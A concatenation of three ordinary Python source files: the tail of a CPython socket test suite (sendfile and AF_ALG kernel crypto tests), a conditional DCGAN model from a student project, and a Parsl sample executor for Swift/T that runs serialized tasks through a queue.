def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest, UDPTimeoutTest ]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
model.py
|
"""
Namita Vagdevi Cherukuru
C32671672
Introduction to Information Retrieval
Project Phase II
"""
from __future__ import division
import os
import time
import Queue
import threading
from PIL import Image
from cStringIO import StringIO
import math
from glob import glob
import tensorflow as tf
import numpy as np
from six.moves import xrange
from ops import *
from utils import *
def conv_out_size_same(size, stride):
return int(math.ceil(float(size) / float(stride)))
class DCGAN(object):
def __init__(self, sess, input_height=64, input_width=64, crop=True,
batch_size=64, sample_num = 64, output_height=64, output_width=64,
y_dim=6, z_dim=256, c_dim=3, dataset_name='default',
input_fname_pattern='*.jpg', checkpoint_dir=None, sample_dir=None):
"""
Args:
sess: TensorFlow session
batch_size: The size of batch. Should be specified before training.
y_dim: (optional) Dimension of dim for y. [None]
z_dim: (optional) Dimension of dim for Z. [100]
gf_dim: (optional) Dimension of gen filters in first conv layer. [64]
df_dim: (optional) Dimension of discrim filters in first conv layer. [64]
gfc_dim: (optional) Dimension of gen units for for fully connected layer. [1024]
dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]
c_dim: (optional) Dimension of image color. For grayscale input, set to 1. [3]
"""
self.sess = sess
self.crop = crop
self.batch_size = batch_size
self.sample_num = sample_num
self.input_height = input_height
self.input_width = input_width
self.output_height = output_height
self.output_width = output_width
self.y_dim = y_dim
self.z_dim = z_dim
self.is_train = tf.placeholder(tf.bool, [])
# batch normalization : deals with poor initialization helps gradient flow
with tf.variable_scope('GAN'):
self.d_bn1 = batch_norm(name='d_bn1')
self.d_bn2 = batch_norm(name='d_bn2')
self.d_bn3 = batch_norm(name='d_bn3')
self.d_bn4 = batch_norm(name='d_bn4')
self.g_bn0 = batch_norm(name='g_bn0')
self.g_bn1 = batch_norm(name='g_bn1')
self.g_bn2 = batch_norm(name='g_bn2')
self.g_bn3 = batch_norm(name='g_bn3')
self.g_bn4 = batch_norm(name='g_bn4')
self.g_bn5 = batch_norm(name='g_bn5')
self.g_bn6 = batch_norm(name='g_bn6')
self.dataset_name = dataset_name
self.input_fname_pattern = input_fname_pattern
self.checkpoint_dir = checkpoint_dir
_,_,_,self.data,_,_=np.load('../'+self.dataset_name)
self.c_dim=3
self.grayscale = (self.c_dim == 1)
self.build_model()
def build_model(self):
self.y= tf.placeholder(tf.float32, [self.batch_size, self.y_dim], name='y')
if self.crop:
image_dims = [self.output_height, self.output_width, self.c_dim]
else:
image_dims = [self.input_height, self.input_width, self.c_dim]
self.inputs = tf.placeholder(
tf.float32, [self.batch_size] + image_dims, name='real_images')
self.sample_inputs = tf.placeholder(
tf.float32, [self.sample_num] + image_dims, name='sample_inputs')
inputs = self.inputs
sample_inputs = self.sample_inputs
self.z = tf.placeholder(
tf.float32, [None, self.z_dim], name='z')
self.z_sum = histogram_summary("z", self.z)
self.G = self.generator(self.z, self.y)
self.D = \
self.discriminator(inputs, self.y, reuse=False)
self.sampler = self.sampler(self.z, self.y)
self.D_ = \
self.discriminator(self.G, self.y, reuse=True)
self.d_sum = histogram_summary("d", self.D)
self.d__sum = histogram_summary("d_", self.D_)
self.G_sum = image_summary("G", self.G)
self.d_loss_real = tf.reduce_mean(tf.square(self.D-1))
self.d_loss_fake = tf.reduce_mean(tf.square(self.D_))
self.g_loss = tf.reduce_mean(tf.square(self.D_-1))
self.d_loss_real_sum = scalar_summary("d_loss_real", self.d_loss_real)
self.d_loss_fake_sum = scalar_summary("d_loss_fake", self.d_loss_fake)
self.d_loss = (self.d_loss_real + self.d_loss_fake)/2
self.g_loss_sum = scalar_summary("g_loss", self.g_loss)
self.d_loss_sum = scalar_summary("d_loss", self.d_loss)
t_vars = tf.trainable_variables()
self.d_vars = [var for var in t_vars if 'd_' in var.name]
self.g_vars = [var for var in t_vars if 'g_' in var.name]
self.saver = tf.train.Saver([k for k in tf.global_variables() if k.name.startswith('GAN')])
def train(self, config):
d_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1, beta2=0.99) \
.minimize(self.d_loss, var_list=self.d_vars)
g_optim = tf.train.AdamOptimizer(config.learning_rate, beta1=config.beta1, beta2=0.99) \
.minimize(self.g_loss, var_list=self.g_vars)
try:
tf.global_variables_initializer().run()
except:
tf.initialize_all_variables().run()
self.g_sum = merge_summary([self.z_sum, self.d__sum,
self.G_sum, self.d_loss_fake_sum, self.g_loss_sum])
self.d_sum = merge_summary(
[self.z_sum, self.d_sum, self.d_loss_real_sum, self.d_loss_sum])
self.writer = SummaryWriter("./logs", self.sess.graph)
sample_z = np.random.normal(size=(self.sample_num , self.z_dim))
#sample_z = rand_z/np.linalg.norm(rand_z, axis=1, keepdims=True)
def load_batch(q):
imgs=np.zeros([self.batch_size,64,64,self.c_dim])
labels=np.zeros([self.batch_size,self.y_dim])
itemnum=len(self.data)
while True:
for i in range(self.batch_size):
idx = np.random.randint(itemnum)
jpg=np.asarray(Image.open(StringIO(self.data[idx]['imgs'])).convert('RGB').resize((64,64)))
jpg=(jpg-127.5)/127.5
y=self.data[idx]['c']
imgs[i],labels[i]=jpg,y
q.put((imgs,labels))
q=Queue.Queue(maxsize=5)
for i in range(1):
t = threading.Thread(target=load_batch,args=[q])
t.start()
if config.dataset == 'mnist':
sample_inputs = self.data_X[0:self.sample_num]
sample_labels = self.data_y[0:self.sample_num]
else:
sample_inputs, sample_labels = q.get()
counter = 1
start_time = time.time()
could_load, checkpoint_counter = self.load(self.checkpoint_dir)
if could_load:
counter = checkpoint_counter
print(" [*] Load SUCCESS")
else:
print(" [!] Load failed...")
for epoch in xrange(config.epoch):
#self.data = glob(os.path.join(
# "./data", config.dataset, self.input_fname_pattern))
batch_idxs = min(len(self.data), config.train_size) // config.batch_size
for idx in xrange(0, batch_idxs):
if config.dataset == 'mnist':
batch_images = self.data_X[idx*config.batch_size:(idx+1)*config.batch_size]
batch_labels = self.data_y[idx*config.batch_size:(idx+1)*config.batch_size]
else:
batch_images,batch_labels=q.get()
batch_z = np.random.normal(size=(config.batch_size, self.z_dim))
#batch_z = batch_z/np.linalg.norm(batch_z,axis=1,keepdims=True)
if True:
# Update D network
_, summary_str = self.sess.run([d_optim, self.d_sum],
feed_dict={
self.inputs: batch_images,
self.z: batch_z,
self.y:batch_labels,
self.is_train: True
})
self.writer.add_summary(summary_str, counter)
# Update G network
_, summary_str = self.sess.run([g_optim, self.g_sum],
feed_dict={
self.z: batch_z,
self.y:batch_labels,
self.is_train: True
})
self.writer.add_summary(summary_str, counter)
# Run g_optim twice to make sure that d_loss does not go to zero (different from paper)
#_, summary_str = self.sess.run([g_optim, self.g_sum],
# feed_dict={ self.z: batch_z, self.y:batch_labels })
#self.writer.add_summary(summary_str, counter)
errD_fake = self.d_loss_fake.eval({
self.z: batch_z,
self.y:batch_labels,
self.is_train: False
})
errD_real = self.d_loss_real.eval({
self.inputs: batch_images,
self.y:batch_labels,
self.is_train: False
})
errG = self.g_loss.eval({
self.z: batch_z,
self.y: batch_labels,
self.is_train: False
})
counter += 1
print("Epoch: [%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f" \
% (epoch, idx, batch_idxs,
time.time() - start_time, errD_fake+errD_real, errG))
if np.mod(counter, 100) == 1:
if config.dataset == 'mnist':
samples, d_loss, g_loss = self.sess.run(
[self.sampler, self.d_loss, self.g_loss],
feed_dict={
self.z: sample_z,
self.inputs: sample_inputs,
self.y:sample_labels,
self.is_train: False
}
)
manifold_h = int(np.ceil(np.sqrt(samples.shape[0])))
manifold_w = int(np.floor(np.sqrt(samples.shape[0])))
save_images(samples, [manifold_h, manifold_w],
'./{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
print("[Sample] d_loss: %.8f, g_loss: %.8f" % (d_loss, g_loss))
else:
try:
samples, d_loss, g_loss = self.sess.run(
[self.sampler, self.d_loss, self.g_loss],
feed_dict={
self.z: sample_z,
self.inputs: sample_inputs,
self.y:sample_labels,
self.is_train: False
},
)
manifold_h = int(np.ceil(np.sqrt(samples.shape[0])))
manifold_w = int(np.floor(np.sqrt(samples.shape[0])))
save_images(samples, [manifold_h, manifold_w],
'./{}/train_{:02d}_{:04d}.png'.format(config.sample_dir, epoch, idx))
print("[Sample] d_loss: %.8f, g_loss: %.8f" % (d_loss, g_loss))
except:
print("one pic error!...")
if np.mod(counter, 500) == 2:
self.save(config.checkpoint_dir, counter)
def discriminator(self, image, y=None, reuse=False):
with tf.variable_scope("discriminator") as scope:
if reuse:
scope.reuse_variables()
yb = tf.reshape(y, [self.batch_size, 1, 1, self.y_dim])
x = conv_cond_concat(image, yb)
h0 = lrelu(conv2d(x, 64, name='d_h0_conv'))
h0 = conv_cond_concat(h0, yb)
h1 = lrelu(self.d_bn1(conv2d(h0, 128, name='d_h1_conv'),is_train=self.is_train))
h1 = conv_cond_concat(h1, yb)
h2 = lrelu(self.d_bn2(conv2d(h1, 256, name='d_h2_conv'),is_train=self.is_train))
h2 = conv_cond_concat(h2, yb)
h3 = lrelu(self.d_bn3(conv2d(h2, 512, name='d_h3_conv'),is_train=self.is_train))
#h3 = conv_cond_concat(h3, yb)
#h4 = lrelu(self.d_bn4(linear(tf.reshape(h3, [int(h3.get_shape()[0]), -1]), 1024, 'd_h3_lin')))
#h4 = tf.concat([h4, y],1)
#h5 = linear(tf.reshape(h4, [int(h4.get_shape()[0]), -1]), 1, 'd_h4_lin')
h4=linear(tf.reshape(h3, [int(h3.get_shape()[0]), -1]), 1, 'd_h4_lin')
return h4
def generator(self, z, y=None):
with tf.variable_scope("generator") as scope:
z = tf.concat([z, y], 1)
self.z_, self.h0_w, self.h0_b = linear(z, 4*4*256, 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(self.z_, [-1, 4, 4, 256])
h0 = lrelu(self.g_bn0(self.h0,is_train=self.is_train))
self.h1, self.h1_w, self.h1_b = deconv2d(h0,
[self.batch_size, 8, 8, 256], name='g_h1', with_w=True)
h1 = lrelu(self.g_bn1(self.h1,is_train=self.is_train))
self.h2, self.h2_w, self.h2_b = deconv2d(h1,
[self.batch_size, 8, 8, 256], stride=1, name='g_h2', with_w=True)
h2 = lrelu(self.g_bn2(self.h2,is_train=self.is_train))
h3, self.h3_w, self.h3_b = deconv2d(h2,
[self.batch_size, 16, 16, 256], name='g_h3', with_w=True)
h3 = lrelu(self.g_bn3(h3,is_train=self.is_train))
h4, self.h4_w, self.h4_b = deconv2d(h3,
[self.batch_size, 16, 16, 256], stride=1, name='g_h4', with_w=True)
h4 = lrelu(self.g_bn4(h4,is_train=self.is_train))
h5, self.h5_w, self.h5_b = deconv2d(h4,
[self.batch_size, 32, 32, 128], name='g_h5', with_w=True)
h5 = lrelu(self.g_bn5(h5,is_train=self.is_train))
h6, self.h6_w, self.h6_b = deconv2d(h5,
[self.batch_size, 64, 64, 64], name='g_h6', with_w=True)
h6 = lrelu(self.g_bn6(h6,is_train=self.is_train))
h7, self.h7_w, self.h7_b = deconv2d(h6,
[self.batch_size, 64, 64, 3], stride=1, name='g_h7', with_w=True)
return tf.nn.tanh(h7)
def sampler(self, z, y=None):
with tf.variable_scope("generator") as scope:
scope.reuse_variables()
z = tf.concat([z, y], 1)
self.z_, self.h0_w, self.h0_b = linear(z, 4*4*256, 'g_h0_lin', with_w=True)
self.h0 = tf.reshape(self.z_, [-1, 4, 4, 256])
h0 = lrelu(self.g_bn0(self.h0,is_train=self.is_train))
self.h1, self.h1_w, self.h1_b = deconv2d(h0,
[self.batch_size, 8, 8, 256], name='g_h1', with_w=True)
h1 = lrelu(self.g_bn1(self.h1,is_train=self.is_train))
self.h2, self.h2_w, self.h2_b = deconv2d(h1,
[self.batch_size, 8, 8, 256], stride=1, name='g_h2', with_w=True)
h2 = lrelu(self.g_bn2(self.h2,is_train=self.is_train))
h3, self.h3_w, self.h3_b = deconv2d(h2,
[self.batch_size, 16, 16, 256], name='g_h3', with_w=True)
h3 = lrelu(self.g_bn3(h3,is_train=self.is_train))
h4, self.h4_w, self.h4_b = deconv2d(h3,
[self.batch_size, 16, 16, 256], stride=1, name='g_h4', with_w=True)
h4 = lrelu(self.g_bn4(h4,is_train=self.is_train))
h5, self.h5_w, self.h5_b = deconv2d(h4,
[self.batch_size, 32, 32, 128], name='g_h5', with_w=True)
h5 = lrelu(self.g_bn5(h5,is_train=self.is_train))
h6, self.h6_w, self.h6_b = deconv2d(h5,
[self.batch_size, 64, 64, 64], name='g_h6', with_w=True)
h6 = lrelu(self.g_bn6(h6,is_train=self.is_train))
h7, self.h7_w, self.h7_b = deconv2d(h6,
[self.batch_size, 64, 64, 3], stride=1, name='g_h7', with_w=True)
return tf.nn.tanh(h7)
@property
def model_dir(self):
return "{}_{}_{}_{}".format(
self.dataset_name, self.batch_size,
self.output_height, self.output_width)
def save(self, checkpoint_dir, step):
model_name = "DCGAN.model"
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_name),
global_step=step)
def load(self, checkpoint_dir):
import re
print(" [*] Reading checkpoints...")
checkpoint_dir = os.path.join(checkpoint_dir, self.model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess, os.path.join(checkpoint_dir, ckpt_name))
counter = int(next(re.finditer("(\d+)(?!.*\d)",ckpt_name)).group(0))
print(" [*] Success to read {}".format(ckpt_name))
return True, counter
else:
print(" [*] Failed to find a checkpoint")
return False, 0
|
swift_t.py
|
"""Sample Executor for integration with SwiftT.
This follows the model used by `EMEWS <http://www.mcs.anl.gov/~wozniak/papers/Cancer2_2016.pdf>`_
to some extent.
"""
from concurrent.futures import Future
import logging
import uuid
import threading
import queue
import multiprocessing as mp
from ipyparallel.serialize import pack_apply_message, unpack_apply_message
from ipyparallel.serialize import serialize_object, deserialize_object
from parsl.executors.status_handling import NoStatusHandlingExecutor
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
def runner(incoming_q, outgoing_q):
"""This is a function that mocks the Swift-T side.
It listens on the the incoming_q for tasks and posts returns on the outgoing_q.
Args:
- incoming_q (Queue object) : The queue to listen on
- outgoing_q (Queue object) : Queue to post results on
The messages posted on the incoming_q will be of the form :
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"buffer" : serialized buffer containing the fn, args and kwargs
}
If ``None`` is received, the runner will exit.
Response messages should be of the form:
.. code:: python
{
"task_id" : <uuid.uuid4 string>,
"result" : serialized buffer containing result
"exception" : serialized exception object
}
On exiting the runner will post ``None`` to the outgoing_q
"""
logger.debug("[RUNNER] Starting")
def execute_task(bufs):
"""Deserialize the buffer and execute the task.
Returns the serialized result or exception.
"""
user_ns = locals()
user_ns.update({'__builtins__': __builtins__})
f, args, kwargs = unpack_apply_message(bufs, user_ns, copy=False)
fname = getattr(f, '__name__', 'f')
prefix = "parsl_"
fname = prefix + "f"
argname = prefix + "args"
kwargname = prefix + "kwargs"
resultname = prefix + "result"
user_ns.update({fname: f,
argname: args,
kwargname: kwargs,
resultname: resultname})
code = "{0} = {1}(*{2}, **{3})".format(resultname, fname,
argname, kwargname)
try:
logger.debug("[RUNNER] Executing: {0}".format(code))
exec(code, user_ns, user_ns)
except Exception as e:
logger.warning("Caught exception; will raise it: {}".format(e))
raise e
else:
logger.debug("[RUNNER] Result: {0}".format(user_ns.get(resultname)))
return user_ns.get(resultname)
while True:
try:
# Blocking wait on the queue
msg = incoming_q.get(block=True, timeout=10)
except queue.Empty:
# Handle case where no items were in the queue
logger.debug("[RUNNER] Queue is empty")
except IOError as e:
logger.debug("[RUNNER] Broken pipe: {}".format(e))
try:
# Attempt to send a stop notification to the management thread
outgoing_q.put(None)
except Exception:
pass
break
except Exception as e:
logger.debug("[RUNNER] Caught unknown exception: {}".format(e))
else:
# Handle received message
if not msg:
# Empty message is a die request
logger.debug("[RUNNER] Received exit request")
outgoing_q.put(None)
break
else:
# Received a valid message, handle it
logger.debug("[RUNNER] Got a valid task with ID {}".format(msg["task_id"]))
try:
response_obj = execute_task(msg['buffer'])
response = {"task_id": msg["task_id"],
"result": serialize_object(response_obj)}
logger.debug("[RUNNER] Returing result: {}".format(
deserialize_object(response["result"])))
except Exception as e:
logger.debug("[RUNNER] Caught task exception: {}".format(e))
response = {"task_id": msg["task_id"],
"exception": serialize_object(e)}
outgoing_q.put(response)
logger.debug("[RUNNER] Terminating")
class TurbineExecutor(NoStatusHandlingExecutor):
"""The Turbine executor.
Bypass the Swift/T language and run on top off the Turbine engines
in an MPI environment.
Here is a diagram
.. code:: python
| Data | Executor | IPC | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|outgoing_q -|-> Worker_Process
| | | | | | |
Parsl<---Fut-| | | | result exception
^ | | | | | |
| | | Q_mngmnt | | V V
| | | Thread<--|incoming_q<-|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
"""
def __init__(self, label='turbine', storage_access=None, working_dir=None, managed=True):
"""Initialize the thread pool.
Trying to implement the emews model.
"""
NoStatusHandlingExecutor.__init__(self)
logger.debug("Initializing TurbineExecutor")
self.label = label
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
def start(self):
self.mp_manager = mp.Manager()
self.outgoing_q = self.mp_manager.Queue()
self.incoming_q = self.mp_manager.Queue()
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
logger.debug("Created management thread : %s", self._queue_management_thread)
self.worker = mp.Process(target=runner, args=(self.outgoing_q, self.incoming_q))
self.worker.start()
logger.debug("Created worker : %s", self.worker)
self._scaling_enabled = False
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
while True:
logger.debug("[MTHREAD] Management thread active")
try:
msg = self.incoming_q.get(block=True, timeout=1)
except queue.Empty:
# Timed out.
pass
except IOError as e:
logger.debug("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.debug("[MTHREAD] Caught unknown exception: {}".format(e))
else:
if msg is None:
logger.debug("[MTHREAD] Got None")
return
else:
logger.debug("[MTHREAD] Received message: {}".format(msg))
task_fut = self.tasks[msg['task_id']]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
exception, _ = deserialize_object(msg['exception'])
task_fut.set_exception(exception)
if not self.is_alive:
break
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
logging.debug("In _start %s", "*" * 40)
if self._queue_management_thread is None:
logging.debug("Starting management thread ")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
else:
logging.debug("Management thread already exists, returning")
def shutdown(self):
"""Shutdown method, to kill the threads and workers."""
self.is_alive = False
logging.debug("Waking management thread")
self.incoming_q.put(None) # Wake up the thread
self._queue_management_thread.join() # Force join
